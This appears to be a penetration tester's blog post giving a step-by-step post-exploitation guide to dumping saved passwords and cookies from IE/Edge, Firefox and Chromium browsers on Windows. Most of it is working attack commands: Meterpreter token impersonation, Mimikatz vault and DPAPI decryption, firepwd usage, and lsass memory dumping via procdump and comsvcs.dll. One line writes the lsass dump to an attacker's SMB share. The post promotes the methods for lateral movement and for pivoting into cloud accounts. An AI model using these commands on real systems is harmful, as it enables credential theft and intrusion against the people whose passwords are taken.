Stealing Saved Browser Passwords: Your New Favorite Post-Exploitation Technique

Overview

People reuse passwords, and most people will never stop doing so, despite how frequently they are reminded not to. As every pentester knows, password reuse is commonplace, and we love few things more than finding caches of passwords!

  • Firefox
  • Chrome/Brave/Opera

Stealing passwords saved in IE/Edge

Note: I have not tested this on newer versions of Edge. Older versions use the credential vault (like IE), newer ones cloud save them to Microsoft servers if you’re logged into a Microsoft account. It’s still worth checking either way.

Requirements

To dump creds from IE and old versions of Edge, you need one of the following:

  • NT Authority\System permissions

Dumping creds with PowerShell

You can use the following PowerShell commands to list the saved login, password, and URLs that are stored in your user’s credential vault:

Dumping creds from an NT Authority\System shell

You have a couple of options for this attack if you’re running in a high-integrity shell. If you happen to be running Meterpreter, you can use the following commands to impersonate a user:

load incognito
list tokens -u
impersonate_token <SOME_TOKEN>
shell
vault::cred
vault::list
sekurlsa::minidump lsass.dmp # load the memory dump
vault::cred
vault::list

Stealing Passwords saved in Firefox

How it works: depending on the version, Firefox will store logins and passwords in the following files:

  • Firefox >=32 (key3.db, logins.json)
  • Firefox >=58.0.2 (key4.db, logins.json)
  • Firefox >=75.0 (sha1 pbkdf2 sha256 aes256 cbc used by key4.db, logins.json)
  • at least Thunderbird 68.7.0, likely other versions

Grabbing the key and login files

The default file path that these files are stored in is predictable, but it does contain a random string, so grabbing these files isn’t super easy to script out:

Using firepwd to decrypt logins

The tool that I use to decrypt these files is called firewpd. It’s pretty easy to set up, you just need python 3 and pip:

python3 -m pip install --upgrade pip
cd firepwd
pip3 install -r requirements.txt
python3 firepwd.py # detect files in the current directory
python3 firepwd.py -d alternative_directory/ # trailing "/" required

Stealing Passwords Saved in Chrome/Brave/Opera

Chrome, Brave, and Opera are all built on Chromium, and they all operate under the hood more or less the same. As a result, they all store passwords more or less the same.

Requirements

One of the following:

  • Mimikatz
  • Administrator access or NT Authority\System access

Caveat

The bad news: Chrome et al. use the Win32 DPAPI (specifically, CryptProtectData and CryptUnprotectData) to protect login passwords. This can make it somewhat annoying to decrypt these passwords since any tooling that you’re using needs to be able to consume the Win32 API. That means you’re probably looking at PowerShell, C, C#, or Rust (which supports the Win32 API as of a few weeks ago), and you’re most likely not going to be able to perform this attack offline on a Linux host — the API is transparent and its inner workings are not well-documented.

Important Files

You need the following files from the user’s profile:

Using PowerShell to dump passwords and cookies

Props to @0gtweet for this method — it’s a lot simpler than the method using Mimikatz before. You’re going to need a copy of System.Data.SQLite.dll for this tool, and you’ll need to modify the PowerShell script to include the relative path to it. Make sure to read my addendum below this gist before running it!

Using Mimikatz to dump passwords and cookies

This attack can be performed online or offline, but if you’re doing it offline it rights to dump lsass.exe and therefore requires NT Authority\System privileges. It may or may not require System privileges to perform the attack online (I always do it offline so that I can just use procdump on the target instead of dealing with sneaking Mimikatz past antivirus).

# use procdump with the PID of lsass rather than the imagename 
tasklist /fi "Imagename eq lsass.exe"
procdump -accepteula -ma PID_of_lsass dumpfile.dmp
# use powershell and runDLL32
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id C:\users\public\dump.dmp full
net use X: \\MY_SMB_SERVER\MY_SHARE\
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id X:\lsassdumpbin.dmp full
sekurlsa::minidump lsassdump.dmp
dpapi::chrome /in:"C:/path/to/login/data" /unprotect
dpapi::chrome /in:"C:/path/to/cookies" /unprotect
sekurlsa::dpapi
[000000000n]
* GUID : {$GUID}
* Time : $TIME
* MasterKey : $LONG_MASTER_KEY
* sha1(key) : $SHA1_KEY
dpapi::chrome /in:"C:/path/to/login/data" /masterkey:SHA1_KEY_HERE
dpapi::chrome /in:"C:/path/to/cookies" /masterkey:SHA1_KEY_HERE

Conclusion

In this post, I’ve covered how to dump saved browser credentials from IE, Edge, Firefox, Chrome, Opera, and Brave. This is a great tactic for moving laterally across various domain and intranet web applications, and even can result in the ability to pivot into cloud environments and services (AWS/Azure/O365 credentials, anyone?). Questions or comments? Let me know in the comments section below, or ping me on twitter!

Student, hacker, OSCP. My other computer is your computer.